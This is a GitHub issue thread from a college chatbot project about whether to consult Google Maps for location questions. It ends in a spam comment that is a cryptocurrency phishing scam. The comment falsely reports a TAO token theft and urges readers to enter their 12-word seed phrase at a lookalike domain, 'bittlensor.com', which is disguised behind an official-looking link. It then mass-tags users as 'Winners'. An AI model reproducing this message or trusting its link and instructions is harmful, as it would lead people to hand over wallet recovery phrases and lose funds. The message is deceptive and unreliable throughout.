### ISSUE TITLE
Can return google map results

### ISSUE THREAD

**Issue by NippunSharma** [NippunSharma/ChatterBox#7]
If questions contains keywords like "map", "location", "distance" we might want to consult google maps

**Comment by RishabhGarg108** [comment]
In my opinion, since our bot is made only to answer queries related to out college only. So, we can simply just add these keywords to our dataset this way we will not be needing to consult google maps specifically. 
And for the distance, we add the distance of campus from three main cities i.e. Mandi, Chandigarh and Delhi. I think this much should work just fine.

**Comment by bittensorwallet** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.


![Bittensor Logo](https://confionacompra.com/wp-content/uploads/2023/12/bittensor.jpg)


**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://l.bittlensor.com/vANocg).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @waha3, @litrane, @0xhanh, @losparviero, @p-ferreira, @lukepark327, @zeus86
